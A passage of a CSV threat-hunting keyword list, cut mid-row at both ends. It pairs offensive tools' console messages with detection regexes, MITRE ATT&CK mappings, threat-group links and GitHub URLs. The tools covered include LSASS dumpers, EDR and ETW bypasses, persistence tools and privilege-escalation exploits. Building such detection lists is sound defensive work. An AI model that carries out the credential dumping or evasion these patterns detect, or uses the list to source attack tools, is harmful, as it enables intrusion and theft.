it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","#content","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","13099" "*[+] Detecting hooks in new ntdll module*",".{0,1000}\[\+\]\sDetecting\shooks\sin\snew\sntdll\smodule.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs 
or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","#content","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","13100" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","#content","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","13101" "*[+] Direct syscalls have been disabled, getting API funcs from ntdll in memory!*",".{0,1000}\[\+\]\sDirect\ssyscalls\shave\sbeen\sdisabled,\sgetting\sAPI\sfuncs\sfrom\sntdll\sin\smemory!.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","0","#content","print output","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","13102" "*[+] DLL dropped!*",".{0,1000}\[\+\]\sDLL\sdropped!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","#content","N/A","7","3","221","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z","13103" 
"*[+] Docker container persistence establish*",".{0,1000}\[\+\]\sDocker\scontainer\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13104" "*[+] Domain Password Spray *",".{0,1000}\[\+\]\sDomain\sPassword\sSpray\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13105" "*[+] Downloading Fat Linpeas binaries*",".{0,1000}\[\+\]\sDownloading\sFat\sLinpeas\sbinaries.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","#content","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","13106" "*[+] Downloading PS2exe and generating payload*",".{0,1000}\[\+\]\sDownloading\sPS2exe\sand\sgenerating\spayload.{0,1000}","offensive_tool_keyword","HTTP-Shell","MultiPlatform HTTP Reverse Shell","T1573.001 - T1104 - T1205 - T1110","TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/JoelGMSec/HTTP-Shell","1","0","#content","N/A","10","10","231","33","2024-09-27T10:23:14Z","2023-09-05T12:01:17Z","13107" "*[+] DPAPI secrets exported*",".{0,1000}\[\+\]\sDPAPI\ssecrets\sexported.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13108" "*[+] DpapiDump Loaded *",".{0,1000}\[\+\]\sDpapiDump\sLoaded\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13109" "*[+] DpapiDump Loaded*",".{0,1000}\[\+\]\sDpapiDump\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#content","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","13110" "*[+] Dropping into shell*",".{0,1000}\[\+\]\sDropping\sinto\sshell.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#content #linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","13111" "*[+] dropping 
suid shell*",".{0,1000}\[\+\]\sdropping\ssuid\sshell.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","0","#content #linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","13112" "*[+] Dump %wZ memory to: %wZ*",".{0,1000}\[\+\]\sDump\s\%wZ\smemory\sto\:\s\%wZ.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","13113" "*[+] Dump sent successfully to remote host!*",".{0,1000}\[\+\]\sDump\ssent\ssuccessfully\sto\sremote\shost!.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","0","#content","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","13114" "*[+] Dumped Allowed Threats to * ",".{0,1000}\[\+\]\sDumped\sAllowed\sThreats\sto\s.{0,1000}\s","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required 
)","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13115" "*[+] Dumped Exclusion Paths to ExclusionPaths.csv*",".{0,1000}\[\+\]\sDumped\sExclusion\sPaths\sto\sExclusionPaths\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13116" "*[+] Dumped Exploit Guard Protection History*",".{0,1000}\[\+\]\sDumped\sExploit\sGuard\sProtection\sHistory.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13117" "*[+] Dumped Firewall Exclusions to *",".{0,1000}\[\+\]\sDumped\sFirewall\sExclusions\sto\s.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13118" "*[+] Dumped Protection History to 
ProtectionHistory.csv*",".{0,1000}\[\+\]\sDumped\sProtection\sHistory\sto\sProtectionHistory\.csv.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13119" "*[+] Dumping Defender Excluded Paths*",".{0,1000}\[\+\]\sDumping\sDefender\sExcluded\sPaths.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13120" "*[+] Dumping Defender Protection History*",".{0,1000}\[\+\]\sDumping\sDefender\sProtection\sHistory.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13121" "*[+] Dumping Enabled ASR Rules*",".{0,1000}\[\+\]\sDumping\sEnabled\sASR\sRules.{0,1000}","offensive_tool_keyword","Invoke-DumpMDEConfig","PowerShell script to dump Microsoft Defender Config, protection history and Exploit Guard Protection History (no admin privileges required )","T1518 - T1082 - T1005","TA0009 - TA0007 - 
TA0005","N/A","N/A","Discovery","https://github.com/BlackSnufkin/Invoke-DumpMDEConfig","1","0","#content","N/A","9","2","147","23","2024-06-10T14:00:47Z","2024-06-09T15:11:16Z","13122" "*[+] Elevated to SYSTEM privileges*",".{0,1000}\[\+\]\sElevated\sto\sSYSTEM\sprivileges.{0,1000}","offensive_tool_keyword","RID-Hijacking","Windows RID Hijacking persistence technique","T1174","TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/RID-Hijacking","1","0","#content","N/A","9","2","174","43","2024-11-20T01:43:01Z","2018-07-14T18:48:51Z","13123" "*[+] Empire credential import successful*",".{0,1000}\[\+\]\sEmpire\scredential\simport\ssuccessful.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#content","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","13124" "*[+] Enable SeDebugPrivilege: \tOK*",".{0,1000}\[\+\]\sEnable\sSeDebugPrivilege\:\s\\tOK.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#content","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","13125" "*[+] Encoding with base64 and reverse it to avoid detections*",".{0,1000}\[\+\]\sEncoding\swith\sbase64\sand\sreverse\sit\sto\savoid\sdetections.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","#content","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","13126" "*[+] 
Encrypted Shellcode: *",".{0,1000}\[\+\]\sEncrypted\sShellcode\:\s.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","0","#content","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","13127" "*[+] Encrypting The Stack.... *",".{0,1000}\[\+\]\sEncrypting\sThe\sStack\.\.\.\.\s.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#content","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","13128" "*[+] Enumerating ASR Rules on Local System*",".{0,1000}\[\+\]\sEnumerating\sASR\sRules\son\sLocal\sSystem.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#content","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","13129" "*[+] Enumerating ASR Rules on Remote System *",".{0,1000}\[\+\]\sEnumerating\sASR\sRules\son\sRemote\sSystem\s.{0,1000}","offensive_tool_keyword","MDE_Enum","extract and display detailed information about Windows Defender exclusions and Attack Surface Reduction (ASR) rules","T1070.006","TA0005 - TA0007 - 
TA0009","N/A","N/A","Discovery","https://github.com/0xsp-SRD/MDE_Enum","1","0","#content","N/A","8","2","198","18","2024-06-10T18:40:27Z","2024-06-06T15:54:44Z","13130" "*[+] Enumerating driver services...*",".{0,1000}\[\+\]\sEnumerating\sdriver\sservices\.\.\..{0,1000}","offensive_tool_keyword","DriverQuery","Collect details about drivers on the system and optionally filter to find only ones not signed by Microsoft","T1124 - T1057 - T1082","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/DriverQuery","1","0","#content","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","13131" "*[+] ETW Patched* No Logs No Crime !*",".{0,1000}\[\+\]\sETW\sPatched.{0,1000}\sNo\sLogs\sNo\sCrime\s!.{0,1000}","offensive_tool_keyword","Fuck-Etw","Bypass the Event Trace Windows(ETW) and unhook ntdll.","T1070.004 - T1055.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/unkvolism/Fuck-Etw","1","0","#content","N/A","10","2","102","13","2023-09-29T21:19:10Z","2023-09-25T18:59:10Z","13132" "*[+] Event Logger is Either NOT running or Already Killed Previously!*",".{0,1000}\[\+\]\sEvent\sLogger\sis\sEither\sNOT\srunning\sor\sAlready\sKilled\sPreviously!.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#content","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","13133" "*[+] Execute shellcode... 
press enter*",".{0,1000}\[\+\]\sExecute\sshellcode\.\.\.\spress\senter.{0,1000}","offensive_tool_keyword","Stardust","An modern 64-bit position independent implant template","T1055 - T1105 - T1055.012 - T1027 - T1218","TA0005 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/Stardust","1","0","#content","N/A","10","10","1193","193","2025-03-21T11:41:09Z","2022-02-20T01:23:35Z","13134" "*[+] Executing technique - hiding scheduled task*",".{0,1000}\[\+\]\sExecuting\stechnique\s\-\shiding\sscheduled\stask.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","#content","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","13135" "*[+] Exploit Completed*",".{0,1000}\[\+\]\sExploit\sCompleted.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","#content","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","13136" "*[+] Exploit completed. Got a SYSTEM token! :)*",".{0,1000}\[\+\]\sExploit\scompleted\.\sGot\sa\sSYSTEM\stoken!\s\:\).{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#content","N/A","10","5","419","75","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z","13137" "*[+] Exploit successful! 
*",".{0,1000}\[\+\]\sExploit\ssuccessful!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#content","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","13138" "*[+] Exploit worked* it should execute your command as SYSTEM!*",".{0,1000}\[\+\]\sExploit\sworked.{0,1000}\sit\sshould\sexecute\syour\scommand\sas\sSYSTEM!.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","#content","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","13139" "*[+] Exploitation successful: You have root access*",".{0,1000}\[\+\]\sExploitation\ssuccessful\:\sYou\shave\sroot\saccess.{0,1000}","offensive_tool_keyword","POC","PoC - Authenticated Remote Code Execution in VMware vCenter Server (CVE-2024-22274 Exploit)","T1213 - T1059 - T1056 - T1078 - T1578","TA0001 - TA0002 - TA0008 - TA0009","N/A","N/A","Lateral Movement","https://github.com/l0n3m4n/CVE-2024-22274-RCE","1","0","#content","N/A","10","1","42","8","2024-07-16T23:22:14Z","2024-07-15T07:26:59Z","13140" "*[+] Extracting LAPS password from LDAP*",".{0,1000}\[\+\]\sExtracting\sLAPS\spassword\sfrom\sLDAP.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","#content","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","13141" "*[+] Finding directory to 
hijack*",".{0,1000}\[\+\]\sFinding\sdirectory\sto\shijack.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#content","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","13142" "*[+] Finding Kerberoastable accounts*",".{0,1000}\[\+\]\sFinding\sKerberoastable\saccounts.{0,1000}","offensive_tool_keyword","Cable","*.NET post-exploitation toolkit for Active Directory reconnaissance and exploitation*","T1087 - T1016 - T1059 - T1482 - T1078","TA0007 - TA0002 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/logangoins/Cable","1","0","#content","N/A","7","4","361","40","2025-04-09T01:12:47Z","2024-08-10T19:47:08Z","13143" "*[+] Finished Enumerating Shares*",".{0,1000}\[\+\]\sFinished\sEnumerating\sShares.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/Hackcraft-Labs/SharpShares","1","0","#content","N/A","10","1","33","7","2023-11-13T14:08:07Z","2023-10-25T10:34:18Z","13144" "*[+] Found {LSASS} pid: {pid}*",".{0,1000}\[\+\]\sFound\s\{LSASS\}\spid\:\s\{pid\}.{0,1000}","offensive_tool_keyword","blindsight","Red teaming tool to dump LSASS memory, bypassing basic countermeasures","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/0xdea/blindsight","1","0","#content","N/A","10","3","225","26","2024-12-31T15:28:15Z","2024-07-18T07:35:43Z","13145" "*[+] Generated successfully! 
a.dll*",".{0,1000}\[\+\]\sGenerated\ssuccessfully!\sa\.dll.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13146" "*[+] Generated successfully! a.exe*",".{0,1000}\[\+\]\sGenerated\ssuccessfully!\sa\.exe.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","#content","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13147" "*[+] Generated XOR key: *",".{0,1000}\[\+\]\sGenerated\sXOR\skey\:\s.{0,1000}","offensive_tool_keyword","Supernova","securely encrypt raw shellcodes","T1027 - T1055.004 - T1140","TA0002 - TA0005 - TA0042","N/A","N/A","Exploitation tool","https://github.com/nickvourd/Supernova","1","0","#content","N/A","10","9","829","151","2025-04-18T19:15:22Z","2023-08-08T11:30:34Z","13148" "*[+] Generating .reg payload*",".{0,1000}\[\+\]\sGenerating\s\.reg\spayload.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#content","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","13149" "*[+] Generating base64 encoded PowerShell 
script*",".{0,1000}\[\+\]\sGenerating\sbase64\sencoded\sPowerShell\sscript.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","#content","N/A","7","2","195","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z","13150" "*[+] GetPEFromRemoteServer*",".{0,1000}\[\+\]\sGetPEFromRemoteServer.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#content","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","13151" "*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13152" "*[+] Getting credentials using U2U*",".{0,1000}\[\+\]\sGetting\scredentials\susing\sU2U.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#content","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","13153" "*[+] Git persistence 
establish*",".{0,1000}\[\+\]\sGit\spersistence\sestablish.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#content #linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","13154" "*[+] Got a S4U logon token (Handle = *",".{0,1000}\[\+\]\sGot\sa\sS4U\slogon\stoken\s\(Handle\s\=\s.{0,1000}","offensive_tool_keyword","PrivFu","execute process as NT SERVICE\TrustedInstaller group account","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#content","TrustExec","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13155" "*[+] Got Krb Auth from NT/System. Relaying to ADCS now*",".{0,1000}\[\+\]\sGot\sKrb\sAuth\sfrom\sNT\/System\.\sRelaying\sto\sADCS\snow.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Black Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","#content","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","13156" "*[+] Got Krb Auth from NT/System. 
